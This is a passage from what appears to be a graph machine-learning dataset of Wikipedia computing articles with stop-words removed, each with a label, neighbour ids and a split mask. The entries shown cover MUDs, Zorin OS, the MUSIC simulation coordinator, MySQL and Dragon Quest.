muds said tinymud stood multi-user domain dimension along eventual popularity acronyms mud muck mush muse kind server led eventual adoption term mu* refer tinymud family ubermud untermud moo inspired tinymud direct descendants first version hourglass written yehuda simmons later daniel james debuted 1989 last london mud mega meets aptly named 'adventure '89 initially hosted iowa system initially written arm assembler acorn archimedes 440 1994 made leap venerable archimedes debian linux pc later red hat shifting ubuntu operating system remained ever since early version hourglass also ported pc named vortex ben maizels 1992 although written specifically avalon legend lives went spawn number games including avalon first age ran 1999-2014 defunct 1996 age thrones notably achaea dreams divine lands started life vortex prior moving rapture engine hourglass continues developed 2016 avalon legend lives currently 2901325 written words 2248374 lines game-code 2417900 instructions original game coming 1k 1989 compared 102gb january 2016 1989 lpmud developed lars pensjö hence lp lpmud pensjö avid player tinymud abermud wanted create world flexibility tinymud gameplay abermud order accomplish wrote nowadays known virtual machine called lpmud driver ran c-like lpc programming language used create game world pensjö interest lpmud eventually waned development carried others jörn amylaar rennecke felix dworkin croes tim beek hollebeek lars düning early 1990s lpmud one popular mud codebases descendants original lpmud include mudos dgd swlpc fluffos pike programming language latter work long-time lpmud developer fredrik profezzorn hübinette 1990 release dikumud inspired abermud led virtual explosion hack slash muds based upon code dikumud inspired numerous derivative codebases including circlemud merc rom smaug godwars original diku team comprised sebastian hammer tom madsen katja nyboe michael seifert hans henrik staerfeldt dikumud key influence early evolution mmorpg genre everquest created avid dikumud player brad mcquaid displaying diku-like gameplay verant developers made issue sworn statement actual dikumud code incorporated 1987 david whatley previously played scepter goth island kesmai founded simutronics tom susan zelinski year demonstrated prototype gemstone genie short-lived instance gemstone ii gemstone iii officially launched february 1990 gemstone iii became available aol september 1995 followed release dragonrealms february 1996 end 1997 gemstone iii dragonrealms become first second played games aol typical mud describe room area standing listing objects players non-player characters npcs area well exits carry task player would enter text command take apple attack dragon movement around game environment generally accomplished entering direction abbreviation player wishes move example typing north n would cause player exit current area via path north mud clients often contain functions make certain tasks within mud easier carry example commands buttons click order move particular direction pick item also tools available add hotkey-activated macros telnet mud clients giving player ability move around mud using arrow keys keyboard example many variations overall focus gameplay features muds distinct sub-groups formed used help categorize different game mechanics game genres non-game uses perhaps common approach game design muds loosely emulate structure dungeons dragons campaign focused fighting advancement role-playing muds restrict player-killing favor player versus environment conflict questing labeled hack slash muds may considered particularly appropriate since due room-based nature traditional muds ranged combat typically difficult implement resulting muds equipping characters mainly close-combat weapons style game also historically referred within mud genre adventure games video gaming whole developed meaning adventure game greatly odds usage muds restrict player versus player combat often abbreviated pk player killing accomplished hard coded restrictions various forms social intervention muds without restrictions commonly known pk muds taking step muds devoted solely sort conflict called pure pk muds first genocide 1992 genocide ideas influential evolution player versus player online gaming roleplaying muds generally abbreviated rp muds encourage enforce players act role playing characters times rp muds provide immersive gaming environment others provide virtual world game elements muds roleplay enforced game world heavily computer-modeled sometimes known roleplay intensive muds rpimuds many cases role-playing muds attempt differentiate hack slash types dropping mud name entirely instead using mux multi user experience mush multi user shared hallucination social muds de-emphasize game elements favor environment designed primarily socializing differentiated talkers retaining elements beyond online chat typically online creation community activity element role-playing often muds broadly defined contingents socializers roleplayers server software tinymud family mu* traditionally used implement social muds less-known mud variant talker variety online chat environment typically based server software like ew-too nuts early internet talkers lpmuds majority complex game machinery stripped away leaving communication commands first internet talker cat chat 1990 taking advantage flexibility mud server software muds designed educational purposes rather gaming chat micromuse considered first educational mud argued evolution role complete 1994 would make first many educational moos diversity university 1993 also first educational mud mud medium lends naturally constructionist learning pedagogical approaches mud institute tmi lpmud opened february 1992 gathering place people interested developing lpmud teaching lpc became clear lars pensjö lost interest project tmi focussed lpmud driver library driver evolving mudos tmi mudlib never officially released influential development libraries graphical mud mud uses computer graphics represent parts virtual world visitors prominent early graphical mud habitat written randy farmer chip morningstar lucasfilm 1985 graphical muds require players download special client game artwork range simply enhancing user interface simulating 3d worlds visual spatial relationships customized avatar appearances games meridian 59 everquest ultima online dark age camelot routinely called graphical muds earlier years runescape actually originally intended text-based mud graphics added early development however increase computing power internet connectivity late nineties shift online gaming mass market term graphical mud fell favor replaced mmorpg massively multiplayer online role-playing game term coined richard garriott 1997 within mud technical infrastructure mudlib concatenation mud library defines rules in-game world examples mudlibs include soph mudlib cdlib discworld mudlib lima mudlib lpuniversity mudlib morgengrauen mudlib nightmare mudlib tmi mudlib mud history preserved primarily community sites blogs mainstream sources journalistic repute late 1990s website called mud connector served central curated repository active muds 1995 independent reported 60,000 people regularly played 600 muds 170 muds three years prior independent also noted distinct patterns socialization within mud communities seraphina brennan massively wrote mud community decline 2009 sherry turkle developed theory constant use many cases overuse muds allows users develop different personalities environments uses examples dating back text-based muds mid-1990s showing college students simultaneously live different lives characters separate muds three time schoolwork students claimed way shut lives become part another reality turkle claims could present psychological problem identity today youths story tree short essay written raph koster regarding death legendmud player named karyn raising subject inter-human relationships virtual worlds observations mud-play show styles play roughly categorized achievers focus concrete measurements success experience points levels wealth explorers investigate every nook cranny game evaluate different game mechanical options socializers devote energy interacting players killers focus interacting negatively players permitted killing characters otherwise thwarting play players play one way play one way time exhibit diverse style according richard bartle people go part hero journey—a means self-discovery research suggested various factors combine muds provide users sense presence rather simply communication noun word mud variously written mud mud mud depending speaker context also used verb mud meaning play interact mud mudding referring act mudder naturally one muds compound words portmanteaux mudlist mudsex mudflation also regularly coined puns wet dirt meaning mud endemic example names rom rivers mud muck mush coffeemud codebases mud muddy waters",
    "neighbors": [
      8474,
      1946,
      4134,
      11067,
      3904,
      577,
      1349,
      6982,
      7237,
      7622,
      10953,
      8524,
      9166,
      6993,
      11604,
      11228,
      7646,
      488,
      7144,
      11112,
      4331,
      10862,
      9455,
      5492,
      5239,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 7020,
    "label": 2,
    "text": "Zorin_OS:zorin os zorin os personal computer operating system based ubuntu marketed operating system designed users new linux-based computer systems one operating system built-in features allows users change interface resemble microsoft windows mac os x also comes bundled wine playonlinux allowing users run windows software ease transition gaming zorin os creators distribute different versions operating system three versions ultimate education business version purchase current releases zorin os 15 ultimate zorin os 15 core new editions continue use debian-based linux kernel gnome interface zorin os fully graphical along graphical installer zorin os follows long-term releases main ubuntu system stability security zorin os comes repositories historically ubuntu repositories well zorin os ubuntu-based linux distribution distribution aims user-friendly fully compatible ubuntu base zorin os initially released 12.x series last version zorin os required users clean install 12.4 since able upgrade normal via systems update manager gnome lxde currently official desktop environments lxde tend used mainly lite editions desktop environments also available install repos due ubuntu-based zorin os like ubuntu-counterpart comes default uncomplicated firewall though enabled default zorin os praised intuitive familiar layouts functionality installation process",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      6675,
      7187,
      8209,
      8727,
      10776,
      25,
      10780,
      4637,
      543,
      11297,
      3618,
      9762,
      7204,
      9253,
      5158,
      11305,
      5165,
      7217,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      9784,
      10809,
      576,
      4673,
      10817,
      3654,
      5190,
      8262,
      3147,
      2125,
      1107,
      1110,
      10397,
      89,
      5721,
      10333,
      1632,
      97,
      4192,
      3685,
      8298,
      9324,
      10860,
      5742,
      2671,
      3189,
      7285,
      9335,
      2168,
      1147,
      5755,
      3197,
      1150,
      11388,
      2179,
      2692,
      7812,
      8326,
      8837,
      10883,
      9353,
      6797,
      9873,
      11410,
      2195,
      9366,
      6296,
      8857,
      10394,
      6301,
      1694,
      5279,
      7325,
      673,
      3745,
      9887,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      3248,
      2738,
      6837,
      4790,
      4279,
      10425,
      2239,
      9407,
      8388,
      2763,
      8907,
      9932,
      3791,
      5840,
      6352,
      7382,
      7385,
      8410,
      11481,
      5343,
      1761,
      1253,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9971,
      9461,
      1782,
      5369,
      6393,
      2811,
      8957,
      7938,
      4355,
      10499,
      4360,
      7435,
      1804,
      273,
      2321,
      11539,
      1813,
      6934,
      4887,
      8476,
      8992,
      10016,
      5410,
      10530,
      6436,
      2853,
      2345,
      3369,
      6445,
      7983,
      1842,
      823,
      4409,
      3387,
      7483,
      3903,
      11075,
      11587,
      2375,
      4423,
      5959,
      5962,
      5457,
      11601,
      4951,
      9048,
      10590,
      8033,
      2914,
      5990,
      8551,
      9064,
      8554,
      7534,
      11121,
      2930,
      9074,
      1396,
      5492,
      11648,
      390,
      1416,
      905,
      394,
      3978,
      4493,
      10127,
      912,
      7057,
      11155,
      11667,
      11669,
      3478,
      10646,
      8092,
      926,
      9119,
      421,
      10149,
      6055,
      7082,
      4011,
      9646,
      1455,
      8112,
      11184,
      948,
      439,
      6075,
      9660,
      6078,
      9151,
      10687,
      10694,
      4039,
      8136,
      5067,
      975,
      8147,
      9689,
      2010,
      9693,
      3550,
      6625,
      7140,
      485,
      495,
      6128,
      8177,
      5619,
      8180,
      5110,
      10235,
      2045,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 7021,
    "label": 7,
    "text": "Multi-simulation_coordinator:multi-simulation coordinator music multi-simulation coordinator software developed released incf royal institute technology kth school computer science communication stockholm sweden music designed interconnecting large scale neuronal network simulators either tools allows spike events continuous time series communicated applications cluster computer typical usage cases connecting models developed different simulators connecting parallel simulator post-processing tool music provides standardized software interface api top message-passing interface mpi communication among parallel applications large-scale computational neuroscience simulations enables transfer massive amounts event information continuous values one parallel application another including using different data allocation strategies design standard interface care taken allow easy adaptation existing simulators permit third-party development community-sharing reusable interoperable software tools parallel processing three simulators currently music interfaces moose neuron nest music software library documentation publicly available incf software center",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7022,
    "label": 1,
    "text": "MySQL:mysql mysql s-q-l open-source relational database management system rdbms name combination name co-founder michael widenius daughter sql abbreviation structured query language mysql free open-source software terms gnu general public license also available variety proprietary licenses mysql owned sponsored swedish company mysql ab bought sun microsystems oracle corporation 2010 oracle acquired sun widenius forked open-source mysql project create mariadb mysql component lamp web application software stack others acronym linux apache mysql perl/php/python mysql used many database-driven web applications including drupal joomla phpbb wordpress mysql also used many popular websites including facebook flickr mediawiki twitter youtube mysql written c c++ sql parser written yacc uses home-brewed lexical analyzer mysql works many system platforms including aix bsdi freebsd hp-ux ecomstation i5/os irix linux macos microsoft windows netbsd novell netware openbsd opensolaris os/2 warp qnx oracle solaris symbian sunos sco openserver sco unixware sanos tru64 port mysql openvms also exists mysql server software client libraries use dual-licensing distribution offered gpl version 2 proprietary license support obtained official manual free support additionally available different irc channels forums oracle offers paid support via mysql enterprise products differ scope services price additionally number third party organisations exist provide support services including mariadb percona mysql received positive reviews reviewers noticed performs extremely well average case developer interfaces documentation mention feedback real world via web sites like good also tested fast stable true multi-user multi-threaded sql database server mysql created swedish company mysql ab founded david axmark allan larsson michael monty widenius original development mysql widenius axmark began 1994 first version mysql appeared 23 may 1995 initially created personal usage msql based low-level language isam creators considered slow inflexible created new sql interface keeping api msql keeping api consistent msql system many developers able use mysql instead proprietarily licensed msql antecedent additional milestones mysql development included work version 6 stopped sun microsystems acquisition mysql cluster product uses version 7 decision made jump version 8 next major version number 15 june 2001 nusphere sued mysql ab tcx datakonsult ab original authors michael monty widenius david axmark u.s district court boston breach contract tortious interference third party contracts relationships unfair competition 2002 mysql ab sued progress nusphere copyright trademark infringement united states district court nusphere allegedly violated mysql ab copyright linking mysql gpl'ed code nusphere gemini table without compliance license preliminary hearing judge patti saris 27 february 2002 parties entered settlement talks eventually settled hearing fsf commented judge saris made clear sees gnu gpl enforceable binding license october 2005 oracle corporation acquired innobase oy finnish company developed third-party innodb storage engine allows mysql provide functionality transactions foreign keys acquisition oracle press release mentioned contracts make company software available mysql ab would due renewal presumably renegotiation time 2006 mysql users conference april 2006 mysql ab issued press release confirmed mysql ab innobase oy agreed multi-year extension licensing agreement february 2006 oracle corporation acquired sleepycat software makers berkeley db database engine providing basis another mysql storage engine little effect berkeley db widely used dropped due lack use mysql 5.1.12 pre-ga release mysql 5.1 released october 2006 january 2008 sun microsystems bought mysql ab 1 billion april 2009 oracle corporation entered agreement purchase sun microsystems owners mysql copyright trademark sun board directors unanimously approved deal also approved sun shareholders u.s. government 20 august 2009 14 december 2009 oracle pledged continue enhance mysql done previous four years movement oracle acquisition mysql ab save mysql oracle started one mysql ab founders monty widenius petition 50,000+ developers users called upon european commission block approval acquisition time free software opinion leaders including pamela jones groklaw jan wildeboer carlo piana also acted co-counsel merger regulation procedure advocated unconditional approval merger part negotiations european commission oracle committed mysql server continue least 2015 use dual-licensing strategy long used mysql ab proprietary gpl versions available antitrust eu pressuring divest mysql condition approval merger revealed wikileaks us department justice request oracle pressured eu approve merger unconditionally european commission eventually unconditionally approved oracle acquisition mysql ab 21 january 2010 january 2010 oracle acquisition mysql ab monty widenius started gpl-only fork mariadb mariadb based code base mysql server 5.5 aims maintain compatibility oracle-provided versions mysql offered two different editions open source mysql community server proprietary enterprise server mysql enterprise server differentiated series proprietary extensions install server plugins otherwise shares version numbering system built code base major features available mysql 5.6 developers release minor updates mysql server approximately every two months sources obtained mysql website mysql github repository gpl license using storage engines default innodb mysql comply full sql standard implemented functionality including foreign key references check constraints parsed ignored storage engines mysql version 8.0.15 mysql 5.7 triggers limited one per action timing meaning one trigger defined executed insert operation one insert table triggers defined views mysql database inbuilt functions like unix_timestamp return 0 03:14:07 utc 19 january 2038 recently attempt solve problem assigned internal queue mysql built installed manually source code commonly installed binary package unless special customizations required linux distributions package management system download install mysql minimal effort though configuration often required adjust security optimization settings though mysql began low-end alternative powerful proprietary databases gradually evolved support higher-scale needs well still commonly used small medium scale single-server deployments either component lamp-based web application standalone database server much mysql appeal originates relative simplicity ease use enabled ecosystem open source tools phpmyadmin medium range mysql scaled deploying powerful hardware multi-processor server gigabytes memory however limits far performance scale single server 'scaling larger scales multi-server mysql 'scaling deployments required provide improved performance reliability typical high-end configuration include powerful master database handles data write operations replicated multiple slaves handle read operations master server continually pushes binlog events connected slaves event failure slave promoted become new master minimizing downtime improvements performance achieved caching results database queries memory using memcached breaking database smaller chunks called shards spread across number distributed server clusters logical backup tool included community enterprise editions mysql supports backing storage engines mysql enterprise backup hot backup utility included part mysql enterprise subscription oracle offering native innodb hot backup well backup storage engines oracle mysql offers high availability solution mix tools including mysql router mysql shell based group replication open source tools mariadb offers similar offer terms products mysql also run cloud computing platforms microsoft azure amazon ec2 oracle cloud infrastructure common deployment models mysql cloud graphical user interface gui type interface allows users interact electronic devices programs graphical icons visual indicators secondary notation opposed text-based interfaces typed command labels text navigation guis easier learn command-line interfaces clis require commands typed keyboard third-party proprietary free graphical administration applications front ends available integrate mysql enable users work database structure data visually well-known front ends command-line interface means interacting computer program user issues commands program typing successive lines text command lines mysql ships many command line tools main interface client mysql utilities set utilities designed perform common maintenance administrative tasks originally included part mysql workbench utilities stand-alone download available oracle percona toolkit cross-platform toolkit mysql developed perl percona toolkit used prove replication working correctly fix corrupted data automate repetitive tasks speed servers percona toolkit included several linux distributions centos debian packages available fedora ubuntu well percona toolkit originally developed maatkit late 2011 maatkit longer developed mysql shell tool interactive use administration mysql database supports javascript python sql modes used administration access purposes many programming languages language-specific apis include libraries accessing mysql databases include mysql connector/net integration microsoft visual studio languages c vb commonly used jdbc driver java addition odbc interface called mysql connector/odbc allows additional programming languages support odbc interface communicate mysql database asp coldfusion htsql url-based query method also ships mysql adapter allowing direct interaction mysql database web client via structured urls drivers exists languages like python node.js variety mysql forks exist including following",
    "neighbors": [
      9729,
      1539,
      5635,
      8195,
      9731,
      11268,
      3080,
      5640,
      1546,
      1035,
      6153,
      1549,
      10254,
      2064,
      10258,
      4116,
      11284,
      6166,
      10262,
      3096,
      8217,
      9243,
      546,
      10276,
      5669,
      10789,
      10791,
      1579,
      4140,
      5677,
      10286,
      11309,
      3636,
      1594,
      3131,
      5691,
      6721,
      8262,
      9286,
      10824,
      11338,
      6219,
      8781,
      5198,
      7248,
      2130,
      1107,
      597,
      10327,
      4696,
      7771,
      4194,
      7779,
      10340,
      6245,
      11363,
      8295,
      3176,
      9320,
      5738,
      3692,
      2669,
      3182,
      1135,
      11375,
      113,
      5233,
      6769,
      3188,
      9333,
      1142,
      119,
      631,
      2681,
      5242,
      10873,
      3709,
      9343,
      11392,
      3714,
      5251,
      7812,
      8837,
      3206,
      9348,
      5768,
      7816,
      4235,
      6797,
      9360,
      11410,
      5779,
      3221,
      2710,
      10389,
      6299,
      5788,
      4255,
      8863,
      161,
      7841,
      8353,
      2727,
      8871,
      10921,
      1707,
      7339,
      9389,
      5806,
      3247,
      8878,
      2225,
      6322,
      2227,
      692,
      2228,
      10413,
      1211,
      10939,
      6338,
      5827,
      6850,
      6341,
      1222,
      10436,
      3784,
      8393,
      11030,
      1739,
      4811,
      6860,
      5841,
      3285,
      1755,
      2780,
      2269,
      734,
      8923,
      10459,
      1250,
      8419,
      9955,
      3819,
      1775,
      5872,
      8434,
      11506,
      2804,
      5879,
      2810,
      7930,
      11515,
      5374,
      3328,
      7426,
      5379,
      1801,
      9481,
      11017,
      5900,
      9997,
      1809,
      11029,
      5910,
      10518,
      1304,
      1816,
      1817,
      2841,
      5403,
      7453,
      8986,
      6943,
      9503,
      11551,
      8994,
      2339,
      1316,
      7983,
      8495,
      9010,
      9012,
      3894,
      823,
      2871,
      10553,
      2364,
      4927,
      2369,
      6465,
      10565,
      8007,
      1353,
      2377,
      5964,
      847,
      2895,
      6993,
      7506,
      2901,
      8539,
      2398,
      863,
      864,
      865,
      4960,
      5471,
      7523,
      1383,
      1385,
      362,
      8554,
      11626,
      2413,
      3951,
      11120,
      7537,
      9585,
      7539,
      1399,
      2424,
      888,
      11129,
      6015,
      11135,
      5506,
      899,
      9090,
      4485,
      6533,
      8582,
      10632,
      908,
      1933,
      1935,
      3986,
      4502,
      1943,
      2456,
      9112,
      2970,
      10137,
      412,
      1950,
      2462,
      3487,
      2465,
      7072,
      9634,
      10660,
      7078,
      11688,
      5546,
      5549,
      11191,
      5048,
      7608,
      9144,
      10681,
      7104,
      4033,
      8128,
      9665,
      8644,
      11201,
      1480,
      10186,
      5067,
      10193,
      11218,
      1491,
      3541,
      4053,
      9687,
      4056,
      9177,
      4058,
      6107,
      10200,
      10201,
      11221,
      11232,
      3042,
      5093,
      7654,
      8683,
      6124,
      7148,
      8179,
      10739,
      4085,
      4598,
      8181,
      4601,
      10236,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7023,
    "label": 3,
    "text": "Dragon_Quest_(video_game):dragon quest video game dragon quest created yuji horii took inspiration previous role-playing games wizardry ultima 1983 game portopia serial murder case horii wanted create rpg would appeal wide audience people unfamiliar genre video games general tried place greater emphasis storytelling emotional involvement well simplify interface expose mostly western computer genre japanese console market manga artist dragon ball creator akira toriyama produced game artwork koichi sugiyama composed music north american version features numerous changes including battery-backed ram save games rather using password save system modified character sprites pseudo-elizabethan english style dialog dragon quest commercially successful japan 2 million copies sold release dragon warrior north america western countries less favorably received later western critics noted game shortcomings acknowledged importance genre fan-made rom hacks released substantial changes game game synthesized soundtrack orchestrated music performed numerous concerts whole dragon warrior credited establishing basic template japanese console rpgs followed dragon warrior role-playing video game gameplay mechanics described years release simplistic spartan players control young hero sets defeat known dragonlord starting game players presented menu allows begin new quest game continue previous quest change speed messages appear screen japanese version continuing quest requires players enter password north american nintendo entertainment system nes english version quest saved onto game cartridge battery-backup known game adventure log imperial scrolls honor english version also options delete duplicate saved quest players choose start new quest may give hero name wish either japanese kana english letters depending version hero name effect initial ability scores statistical growth course game stat falls one two categories one faster growth game determines path stat uses formula based kana letters character name. ref name= guide 6/105 /ref dragon warrior presents players clear objective start uses series smaller scenarios increase hero strength order achieve objective game begins king lorik chamber tantegel castle hero receives information dragonlord must defeat stolen balls light must retrieve receiving items gold hero sets quest much dragon warrior spent talking townspeople gathering information leads additional places events secrets players advised take notes hints future reference towns contain shops sell improved weapons armor general stores player may buy goods inns allow hero recover health magic shops offer keys purchase players may sell items half price shops provide weapons armor general goods hero status window shown whenever stops moving displaying current experience level lv number hit points hp magic points mp gold g experience points e safely progress next areas game players need accumulate experience points gold defeating enemies outside towns – overworld dungeons apart dragonlord castle physical restrictions players roam instead monsters increase difficulty players venture tantegel castle hero level increases players explore afield less risk enemies appear random encounters hero fights one opponent time encounter rate lowest fields increases forests hills battles turn-based fought first-person perspective hero remains off-screen combat players must defeat enemy reducing hp zero combat players four commands fight run spell item fight command causes hero attack enemy weapon bare fists weapon available attempt inflict damage run command hero attempts escape battle recommended hp low spell command casts magic example heal hero damage enemy item command uses herbs replenish hero hp combat hero loses hp takes damage display turns red hp low hp falls zero dies taken back king lorik resurrected loses half gold punishment hero succeeds defeating enemy gains experience points gold gains enough experience points experience level increases giving greater strength agility speed ability use magic spells every time spell used hero mp decreases different spells costing different amounts mp hp mp restored resting inn additionally non-player character replenish hero mp tantegel castle hero earns gold purchase better weapons armor items however players limited inventory space hold items must manage item collection conservatively caves hero explores dark require use torch radiant spell display temporary field vision around character english version players return king lorik point save quest japanese version battery backup players receive password return quest later time control pad may used move hero direction move flashing cursor menu displays additional buttons confirm cancel commands english version players use menu commands talk people check status search beneath feet use items take treasure chests open doors go stairs however game later remakes certain commands assigned buttons navigating stairs became automatic hero speed increased japanese version characters always face forward players must choose command direction perform action north american version hero turns face direction moving making direction selection unnecessary dragon warrior plot twist saving princess dragon n't even meet speak complete game dragon warrior sequel dragon quest ii prequel dragon quest iii comprise trilogy shared timeline story background begins kingdom alefgard shrouded permanent darkness brave warrior erdrick known loto game boy color gbc remake game defeated evil creature restored light land erdrick possession ball light used drive away enemies threatened kingdom erdrick handed ball light king lorik alefgard remained peaceful long time ball light kept winters short alefgard helped maintain peace prosperity region however one man shunned ball light radiance secluded mountain cave one day exploring cave extensive network tunnels man encountered sleeping dragon awoke upon entrance feared dragon would incinerate fiery breath dragon instead knelt obeyed commands man later discovered dragon became known dragonlord one day soul became corrupted learning magic dragonlord attacked tantegel castle nearby town breconnary fleet dragons set town fire riding large red dragon dragonlord descended upon tantegel castle stole ball light soon monsters began appear throughout entire land destroying everything paths much land became poisonous marshes least one destroyed town hauksness whose name erroneously transposed rimuldar adventurer handbook walkthrough never recovered remains ruins even time gameplay following day erdrick arrived tantegel castle speak king lorik offered help defeat dragonlord searching land clues dragonlord whereabouts erdrick found dragonlord lived island could accessed via magical bridge rainbow drop could generate venturing island erdrick never heard many years later king lorik xvi reign dragonlord attacked kingdom captured princess gwaelin many heroes tried rescue princess recover ball light dragonlord castle called charlock none succeeded prophet mahetta predicted one day descendant valiant erdrick shall come forth defeat dragonlord however descendant game hero arrives many people alefgard forgotten story erdrick remember consider myth believe mahetta prophecy king lorik starts mourn decline kingdom game begins player assumes role stranger arrives tantegel castle castle guard tells dragon captured princess holding captive distant cave determined rescue princess defeat dragonlord discovers ancient tablet hidden inside desert cave carved tablet message erdrick outlines hero needs follow erdrick footsteps defeat dragonlord hero eventually rescues princess gwaelin realizes order restore light alefgard must defeat dragonlord charlock castle hero collects series relics creates bridge reach charlock fights way castle finally confronting dragonlord point hero given dialogue choice – side dragonlord challenge players choose former game ends hero put sleep game freezes however gbc remake hero instead wakes bad dream players choose fight final battle hero dragonlord commences hero defeats dragonlord reclaims ball light eradicating monsters alefgard triumphantly returns tantegel castle king lorik offers kingdom reward hero turns offer instead wishes find kingdom accompanied princess gwaelin hero sets search new land sets stage events dragon warrior ii take place many years later tells story three hero descendants dragon warrior hero dragonlord two main characters major supporting characters king lorik king lars gbc remake daughter princess gwaelin lady lora two sages hero meets journey hero comes land beyond alefgard descendant legendary erdrick hero arrives appear warrior – arrives without weapons armor – ignorant situation populace thinks claim ability defeat dragonlord preposterous however king lorik sees ability give hope aids hero quest dragonlord dragon rules charlock castle visible tantegel castle game starting point soul became evil learning magic rumors say spy network knows everything happens alefgard seeks unlimited power destruction results rising tide evil throughout alefgard dragonlord wants enslave world army monsters controls yuji horii team chunsoft began developing dragon quest 1985 released japan 1986 famicom msx pc-9801 dragon quest released multiple platforms since initial release including mobile phones 2004 updated graphics similar eidansha boshu service center founded 1975 published tabloid magazines advertised real estate 1982 failing establish chain stores company founder yasuhiro fukushima transformed software company devoted gaming renamed enix find talent company fukushima held enix game hobby program contest competition styled manga competitions advertised computer manga magazines million prize winners winners koichi nakamura manga magazine shōnen jump editor yuji horii top winner horii designed tennis game love match tennis became enix first release believe would win motivated editor enjoyed games published horii articles later enix began creating games nes fukushima held another contest time nakamura cartoonish creative contest entry door door became enix first release nes horii earliest inspiration dragon quest 1983 pc visual novel portopia serial murder case – murder mystery adventure game bears similarities games mystery house zork particularly déjà vu horii wanted advance game storyline using dialogue portopia originally released japan nec pc-6001 later ported nes 1985 port enix second release system first game horii nakamura worked together horii redesigned interface port accommodate console limited controls added dungeon-crawling area detective explores portopia directly result dragon quest creation according 1up.com proving ground rpg menu-based command system portopia would later used dragon quest original idea dragon quest came development nes port portopia horii nakamura came across rpg wizardry macworld conference expo influence nes portopia dungeon crawl segments horii liked game depth visuals wanted create game similar wizardry expose mainly western-exclusive rpg genre japan expand genre past computer enthusiasts horii also cited ultima inspiration dragon quest gameplay specifically first-person random battles wizardry overhead perspective ultima rpg genre predominantly western limited pcs japanese gamers enjoyed home-grown games black onyx dragon slayer series alongside western rpg ports however horii nakamura enjoyed dungeon crawling statistical nature wizardry realized people would originally concern success super mario bros. greatly increased potential audience new famicom/nes game create dragon quest gameplay needed simplified according horii keyboard system much simpler using game controller still thought would really exciting player play alter ego game personally playing wizardry ultima time really enjoyed seeing self game order create rpg would appeal wide audience unfamiliar genre video games general horii wanted create new kind rpg rely previous experience dungeons dragons tabletop rpg require hundreds hours rote fighting could appeal kind gamer accomplish needed simplify system players associate hero thus game progressed hero would become stronger contrast games like super mario bros. character mario become progressively powerful game wanted build portopia place greater emphasis storytelling emotional involvement developed coming-of-age tale audiences could relate made use rpg level-building gameplay way represent horii believed famicom ideal platform dragon quest unlike arcade games players would worry spending money got game could continue playing left whenever player loses battle would immediately restored previous save point rather game ending returned main menu making game accessible also wanted include multiple player characters forced use one due memory constraints horii knew rpgs steeper learning curve video games time compensate implemented quick level-ups start game gave players clear final goal visible world map starting point dragonlord castle also provided series smaller scenarios order build player strength achieve final objective created open world blocked physically way except monsters easily kill unprepared players gamasutra described one earliest examples nonlinear gameplay horii used bridges signify changes difficulty implemented level progression high starting growth rate decelerates time contrasted random initial stats constant growth rates early editions dungeons dragons make game appeal larger audience manga artist creator dragon ball akira toriyama hired produce artwork dragon ball toriyama artwork features characters whose strength cunning transcend generations also includes humorous elements chibi style koichi sugiyama game music composer sought enix sugiyama sent pc game feedback questionnaire enix already well-known television composer upon seeing sugiyama feedback fukushima contacted confirm sugiyama television upon confirmation fukushima asked sugiyama compose score dragon quest game classical score sugiyama second video game composition wingman 2 sugiyama said took five minutes compose original opening theme noted difficulty adding personal touch short jingles past experience creating music television commercials helped according sugiyama composer three five seconds catch audience attention music theme jingles dragon quest remained relatively intact sequels coverage dragon quest north american localization first appeared nintendo fun club news winter 1988 issue – title changed dragon warrior title changed avoid infringing trademark wargame publisher simulations publications pen-and-paper rpg dragonquest article game featured images game japanese version erdrick original name roto dragonlord original name dragon king original name game starting location radatome castle briefly explained backstory basic gameplay elements comparing game legend zelda game later mentioned nintendo power pak watch preview section march 1989 mentioning dragon quest iii japanese release magazine premiere july 1988 issue mentioned change name dragon quest dragon warrior inspiration two japanese sequels release still distant time dragon warrior released north america nintendo america direction satoru iwata help horii august 1989 – months japanese release game released north america nearly three years original release japan graphics improved instead lengthy passwords kana characters north american version features battery-backed ram savegame akira toriyama artwork instruction booklets also changed reflect traditional tone found popular american based rpgs ultima series game character sprites changed face direction travel japanese versions sprites smaller face forwards requiring players choose direction actions menu spells given self-explanatory one-word titles instead made-up words japanese version locations renamed dialogue rewritten whimsical style comparable dragon ball style inspired elizabethan english sentences thy hit points decreased 1 nintendo also removed salacious humor religious connotations english-language version example japanese version town hero first buys keys woman offers sell puff-puff – japanese onomatopoeia girl rubbing breasts someone face juggling breasts north american version woman sells tomatoes term included game sequels well toriyama dragon ball series katsuya terada created artwork early dragon warrior articles nintendo power neither terada editing artwork instruction booklet followed toriyama work instead used settings character poses create alternate artwork american style japanese hero drawn super deformed manga style english version appearance based west template medieval hero june 1989 electronic gaming monthly quartermann speculated dragon warrior would nintendo big release north america christmas based series immense popularity japan especially dragon quest iii sales nintendo power provided three feature articles dragon warrior issues may october 1989 november–december 1989 issue includes strategy guide march–april 1990 issue nintendo power map game world poster super contra side also features dragon warrior text adventure late 1990 nintendo power gave free copies dragon warrior subscribers including 64-page explorer handbook full walkthrough game additional backstory mentioned original instruction booklet nintendo reportedly interested getting rid unsold copies game gave away subscribers time game cost approximately retail magazine subscription fee respectively adjusted inflation giveaway attracted nearly 500,000 new magazine subscribers many renewed subscription get game ultimately led success series western market enix remade dragon quest dragon quest ii one-cartridge compilation known dragon quest ii super famicom december 18 1993 remake sold 1.2 million copies japan 1998 enix released bs dragon quest super famicom satellaview extension exclusively japan latter consisted four one-hour scenarios players would download weekly schedule players tasked leveling character collecting medals completing scenario-specific conditions special events designed occur specific conditions real-time dragon warrior dragon warrior ii re-released part similar compilation gbc titled dragon warrior ii developed tose released enix september 23 1999 japan september 27 2000 north america uses entirely new translation discards pseudo-elizabethan english style uses names closer japanese version remake dragonlord changed dracolord erdrick changed loto several additional features added example players quicksave game anytime outside battle quicksave deleted standard saved game loaded players store gold future use bank case die menu streamlined monsters yield experience gold reduce amount time needed increase levels make saving in-game purchases faster 2004 game along sequel remade mobile phones japan version graphically based super famicom remake dragon quest iii famicom super famicom versions game together dragon quest ii dragon quest iii re-released dragon quest 25th anniversary collection compilation wii japan september 15 2011 compilation includes original copies games strategy guides original artwork material games development october 2013 square enix announced re-releasing dragon quest i–viii android ios november 2013 game released ios 